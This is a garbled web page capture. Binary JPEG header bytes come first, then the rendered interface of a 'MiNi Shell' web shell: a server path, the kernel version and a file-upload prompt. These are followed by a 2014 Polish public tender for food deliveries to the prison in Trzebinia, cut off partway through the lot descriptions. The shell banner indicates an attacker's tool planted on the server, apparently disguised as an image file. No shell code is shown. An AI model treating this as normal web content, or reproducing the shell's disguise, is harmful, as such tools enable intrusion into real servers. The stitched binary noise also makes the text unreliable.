JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/10782-N-2014.html

<p class="kh_header"><b>Trzebinia: Sukcesywne dostawy artykułów spożywczych dla potrzeb Zakładu Karnego w Trzebini - oznaczenie sprawy: DKw-220/01/Ż/2014</b><br>
<b>Numer ogłoszenia: 10782 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Trzebini , ul. Słowackiego 70, 32-540 Trzebinia, woj. małopolskie, tel. 032 6121374 w. 45, faks 032 6121551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Służby Więziennej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych dla potrzeb Zakładu Karnego w Trzebini - oznaczenie sprawy: DKw-220/01/Ż/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia winien być wcześniej odpowiednio posortowany przez wykonawcę i odpowiadać wymaganiom jakościowym stawianym przez Polską Normę, normy unijne oraz spełniać obowiązujące w tym zakresie normy sanitarno-epidemiologiczne, a także winien być przechowywany w siedzibie wykonawcy w warunkach gwarantujących najwyższą jakość.
2.Dostarczone przedmioty zamówienia muszą być oznakowane zgodnie z obowiązującymi w tym zakresie przepisami (nazwa producenta, termin przydatności do spożycia, warunki przechowywania, itp.).
3.Dostawy winny odbywać się w odpowiednio przystosowanych pojemnikach, które spełniają wymagania przewidziane do przechowywania żywności. Koszty opakowań są wliczone w koszty artykułów spożywczych, a opakowania stanowią własność zamawiającego.
4.Przedmiot zamówienia podzielony został odpowiednio na pakiety (części):
PAKIET I - Ryby mrożone i przetworzone
1)ryba mrożona                                                        
ilość: 1200 kg 
ryba mrożona typu kostka mintaj o glazurze 5% lub filet mintaj o glazurze 30%,      pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia  min. 1 miesiąc od daty dostawy 
2)matias słabo solony 				
ilość: 660 kg  
filety śledźiowe lekkosolone typu matias, pakowane w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 1 miesiąc od daty dostawy 
3)sałatka jarzynowa				
ilość: 660 kg 
gotowa do spożycia sałatka garmażeryjna z dodatkiem dowolnego gatunku ryby/lub bez, pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 1 miesiąc od daty dostawy 
PAKIET II - Konserwy i przetwory z mięsa
1)konserwa mięsna wieprzowa 			
ilość: 870 kg
konserwa w puszce metalowej z samootwieraczem, opakowanie jednostkowe 300g lub 330g, konserwa typu mielonka, turystyczna, przysmak śniadaniowy lub równoznaczne, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
2)pasztet drobiowy 					
ilość: 870 kg
konserwa w puszce metalowej z samootwieraczem, opakowanie jednostkowe 300g lub 330g, pasztet drobiowy z dodatkami lub bez dodatków, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
3)paprykarz szczeciński  				
ilość: 870 kg
konserwa w puszce metalowej z samootwieraczem, opakowanie jednostkowe 300g  lub 330g, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
4)sałatka rybna z makreli  				
ilość: 870 kg
konserwa w puszce metalowej z samootwieraczem, opakowanie jednostkowe 300g  lub 330g, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
5)szprot w pomidorach 				
ilość: 870 kg
konserwa w puszce metalowej z samootwieraczem, opakowanie jednostkowe 300g lub 330g, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
6)szprot w oleju 					
ilość: 870 kg
konserwa w puszce metalowej z samootwieraczem, opakowanie jednostkowe 300g  lub 330g, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
7)konserwa mięsna wieprzowa  				
ilość: 870 kg
konserwa (w puszce metalowej lub aluminiowej) z samootwieraczem, opakowanie jednostkowe 130g ub 131g, konserwa typu mielonka, turystyczna, przysmak śniadaniowy lub równoznaczne, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
8)pasztet drobiowy 					
ilość: 870 kg
konserwa (w puszce metalowej lub aluminiowej) z samootwieraczem, opakowanie jednostkowe 130g lub 131g, pasztet drobiowy z dodatkami lub bez dodatków, termin przydatności do spożycia min. 3 miesiące od daty dostawy 
PAKIET III - Tłuszcze zwierzęce lub roślinne i produkty mleczarskie
1)tłuszcz roślinny do smarowania pieczywa	 		
ilość: 6000 kg
produkt spożywczy otrzymany z mieszaniny tłuszczów roślinnych i olejów surowych przeznaczony do smarowania pieczywa, zawartość tłuszczu nie mniej niż 30%, pakowany w opakowanie jednostkowe kostka 200g-500g w papierze pergaminowym lub folii aluminiowej, termin przydatności do spożycia min. 30 dni od daty dostawy
2)olej roślinny jadalny 					
ilość: 1500 l
olej roślinny jadalny, olej rafinowany i konfekcjonowany pakowany w opakowanie jednostkowe butelka plastikowa 1l lub 3l, termin przydatności do spożycia min. 2 miesiące od daty dostawy 
3)ser żółty 						
ilość: 660 kg
ser żółty pakowany w bloku 3kg, termin przydatności do spożycia min. 14 dni od daty dostawy 
4)ser topiony 					
ilość: 660 kg
ser topiony pakowany w opakowanie jednostkowe np. (kiełbaski lub kostka) 100g,  ser topiony o różnych smakach, termin przydatności do spożycia min. 2 miesiące od daty dostawy 
5)serek wiejski 					
ilość: 990 kg
serek wiejski ziarnisty pakowany w opakowanie jednostkowe 125g-150g, termin przydatności do spożycia min. 14 dni od daty dostawy 
6)twaróg półtłusty 					
ilość: 660 kg
twaróg półtłusty pakowany w opakowanie jednostkowe próżniowe 100g lub 200g,  termin przydatności do spożycia min. 14 dni od daty dostawy 
7)serek homogenizowany 				
ilość: 990 kg
serek homogenizowany pakowany w opakowanie jednostkowe 125g-150g, serek homogenizowany o różnych smakach, termin przydatności do spożycia min. 14 dni od daty dostawy 
8)serek twarogowy 					
ilość: 990 kg
serek twarogowy pakowany w opakowanie jednostkowe 125g-150g, serek twarogowy o różnych smakach, termin przydatności do spożycia min. 14 dni od daty dostawy 
9)jogurt owocowy 					
ilość: 990 kg
jogurt pakowany w opakowanie jednostkowe 125g-150g, jogurt o różnych smakach, termin przydatności do spożycia min. 14 dni od daty dostawy 
10)kefir 						
ilość: 660 kg
kefir 2% tł. pakowany w opakowanie jednostkowe 370g-400g, termin przydatności  do spożycia min. 14 dni od daty dostawy 
11)śmietana 					
ilość: 540 kg
śmietana 18% tł. pakowana w opakowanie jednostkowe 370g-400g, termin przydatności do spożycia min. 14 dni od daty dostawy 
12)mleko w proszku 					
ilość: 540 kg
mleko w proszku odtłuszczone i granulowane pakowane w opakowanie jednostkowe 12,5kg lub 25kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy 
PAKIET IV - Różne produkty spożywcze
1)dżem owocowy	 				
ilość: 660 kg 
dżem wieloowocowy pakowany w opakowanie jednostkowe o pojemności 10kg-15kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy  
2)marmolada owocowa 				
ilość: 660 kg 
marmolada wieloowocowa pakowana w opakowanie jednostkowe o pojemności 10kg-15kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
3)chrzan tarty 					
ilość: 900 kg
chrzan tarty pakowany w słoikach o pojemności 300g-1200g, termin przydatności  do spożycia min. 2 miesiące od daty dostawy
4)sałatka szwedzka 					
ilość: 1740 l 
sałatka szwedzka lub równoznaczna pakowana w słoikach o pojemności 870ml-1740ml, termin przydatności do spożycia min. 2 miesiące od daty dostawy
5)sałatka wielowarzywna 				
ilość: 1740 l
sałatka wielowarzywna lub równoznaczna pakowana w słoikach o pojemności        870ml-1740ml, termin przydatności do spożycia min. 2 miesiące od daty dostawy
6)cukier biały 					
ilość: 2500 kg
cukier biały kryształ pakowany w opakowanie jednostkowe 1kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
7)kasza jęczmienna 					
ilość: 2500 kg
kasza jęczmienna wiejska pakowana w opakowanie jednostkowe 1kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
8)ryż biały 						
ilość: 2500 kg
ryż biały długoziarnisty pakowany w opakowanie jednostkowe 1kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
9)mąka pszenna 					
ilość: 1100 kg
mąka pszenna pakowana w opakowanie jednostkowe 1kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
10)płatki kukurydziane 					
ilość: 600 kg
płatki kukurydziane pakowane w opakowanie jednostkowe 12,5kg lub 25kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
11)kasza manna 					
ilość: 600 kg
kasza manna pakowana w opakowanie jednostkowe 1kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
12)makarony różne 					
ilość: 3800 kg
makarony różne bezjajeczne wyborowe, w których podstawowym surowcem jest mąka makaronowa typu 950, pakowane w opakowanie jednostkowe 5kg-10kg w czterech rodzajach: nitki, kolanka, świderki, muszelki, termin przydatności do spożycia min. 2 miesiące od daty dostawy
13)barszcz czerwony w proszku 				
ilość: 270 kg
barszcz czerwony w proszku pakowany w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
14)zupa grzybowa w proszku 				
ilość: 270 kg
zupa grzybowa w proszku pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
15)zupa jarzynowa w proszku 				
ilość: 270 kg
zupa jarzynowa w proszku pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
16)zupa ogonowa w proszku 				
ilość: 270 kg
zupa ogonowa w proszku pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
17)zupa pieczarkowa w proszku 				
ilość: 270 kg
zupa pieczarkowa w proszku pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
18)zupa kalafiorowa w proszku 				
ilość: 270 kg
zupa kalafiorowa w proszku pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
19)żurek śląski w proszku 				
ilość: 270 kg
żurek śląski w proszku pakowany w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
20)sos boloński w proszku 				
ilość: 160 kg
sos boloński w proszku pakowany w opakowanie jednostkowe 3kg-6kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
21)sos myśliwski w proszku 				
ilość: 160 kg 
sos myśliwski w proszku pakowany w opakowanie jednostkowe 3kg-6kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
22)sos grzybowy w proszku 				
ilość: 160 kg
sos grzybowy w proszku pakowany w opakowanie jednostkowe 3kg-6kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
23)pieprz czarny mielony 				
ilość: 40 kg
pieprz czarny mielony pakowany w opakowanie jednostkowe 0,100g-2kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
24)kminek 						
ilość: 40 kg
kminek pakowany w opakowanie jednostkowe 0,100g-2kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
25)majeranek 					
ilość: 40 kg
majeranek pakowany w opakowanie jednostkowe 0,100g-2kg, termin przydatności  do spożycia min. 2 miesiące od daty dostawy
26)ziele angielskie 					
ilość: 40 kg
ziele angielskie pakowane w opakowanie jednostkowe 0,100g-2kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
27)liść laurowy 					
ilość: 40 kg
liść laurowy pakowany w opakowanie jednostkowe 0,100g-2kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
28)sól 						
ilość: 800 kg
sól warzona jodowana spożywcza kuchenna próżniowa pakowana w opakowanie jednostkowe 1kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy 
29)ocet spożywczy 					
ilość: 400 l
ocet spożywczy kuchenny 10% pakowany w opakowanie jednostkowym 0,500l lub 1l, termin przydatności do spożycia min. 2 miesiące od daty dostawy
30)przyprawa do zup w płynie 				
ilość: 400 l
przyprawa do zup w płynie pakowana w opakowanie jednostkowe 0,500l lub 1l, termin przydatności do spożycia min. 2 miesiące od daty dostawy
31)herbata granulowana 				
ilość: 600 kg
herbata granulowana pakowana w opakowanie jednostkowe 1kg-25kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
32)majonez 					
ilość: 900 kg
majonez pakowany w opakowanie jednostkowe 835g-5kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
33)musztarda 					
ilość: 900 kg
musztarda pakowana w opakowanie jednostkowe 835g-5kg, termin przydatności    do spożycia min. 2 miesiące od daty dostawy
34)koncentrat pomidorowy 				
ilość: 900 kg
koncentrat pomidorowy 24% z samootwieraczem pakowany w opakowanie jednostkowe 1kg-4,500kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
35)przyprawa do zup w proszku 				
ilość: 400 kg
przyprawa do zup w proszku typu vegeta, kuchareczka, warzywko lub równoznaczna, pakowana w opakowanie jednostkowe 0,500g-1kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
36)fasola jaś 					
ilość: 900 kg
fasola jaś pakowana w opakowanie jednostkowe 10kg-25kg, termin przydatności    do spożycia min. 2 miesiące od daty dostawy
37)groch cały 					
ilość: 900 kg
groch cały pakowany w opakowanie jednostkowe 10kg-25kg, termin przydatności  do spożycia min. 2 miesiące od daty dostawy
38)kostka sojowa 					
ilość: 600 kg
kostka sojowa pakowana w opakowanie jednostkowe 5kg-10kg, termin przydatności do spożycia min. 2 miesiące od daty dostawy
5.Ofertę można złożyć na całość przedmiotu zamówienia lub na wybrany przez wykonawcę pakiet (część), przy czym w każdym pakiecie (części) wymagany jest pełen wyszczególniony w niej asortyment.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.40.00.00-2, 15.10.00.00-9, 15.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp, który stanowi załącznik nr 2 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Złożenie przez wykonawcę druku formularza ofertowego, który stanowi załącznik nr 1 do specyfikacji.
2.Jeżeli oferta zostanie podpisana przez pełnomocnika lub upoważnionego przedstawiciela wykonawcy należy dołączyć pełnomocnictwo (wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert) lub upoważnienie (np. aktualny odpis z KRS - wystawiony nie wcześniej niż 3 miesiące przed upływem składania ofert).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W myśl art. 144 ust. 1 ustawy Pzp treść umowy może być zmieniona w stosunku do treści złożonych ofert w przypadkach wymienionych poniżej:
a)zmiany wynikające z okoliczności, których nie można było przewidzieć w dniu zawarcia umów, a są one korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Kwatermistrzowski
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2014 godzina 08:30, miejsce: Sekretariat
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ryby mrożone i przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)ryba mrożona 					
ilość: 1200 kg
2)matias słabo solony
ilość: 660 kg
3)sałatka jarzynowa
ilość: 660 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwy i przetwory z mięsa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)konserwa mięsna wieprzowa 300g lub 330g			
ilość: 870 kg
2)pasztet drobiowy 300g lub 330g 					
ilość: 870 kg
3)paprykarz szczeciński 300g lub 330g 				
ilość: 870 kg
4)sałatka rybna z makreli 300g lub 330g 				
ilość: 870 kg
5)szprot w pomidorach 300g lub 330g				
ilość: 870 kg
6)szprot w oleju 300g lub 330g 					
ilość: 870 kg
7)konserwa mięsna wieprzowa 130g lub 131g 				
ilość: 870 kg
8)pasztet drobiowy 130g lub 131g 					
ilość: 870 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tłuszcze zwierzęce lub roślinne i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)tłuszcz roślinny do smarowania pieczywa	 		
ilość: 6000 kg
2)olej roślinny jadalny 					
ilość: 1500 l
3)ser żółty 					
ilość: 660 kg
4)ser topiony 					
ilość: 660 kg
5)serek wiejski 					
ilość: 990 kg
6)twaróg półtłusty 					
ilość: 660 kg
7)serek homogenizowany 				
ilość: 990 kg
8)serek twarogowy 					
ilość: 990 kg
9)jogurt owocowy 				
ilość: 990 kg
10)kefir 						
ilość: 660 kg
11)śmietana 					
ilość: 540 kg
12)mleko w proszku 					
ilość: 540 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.50.00.00-3.</p></li>
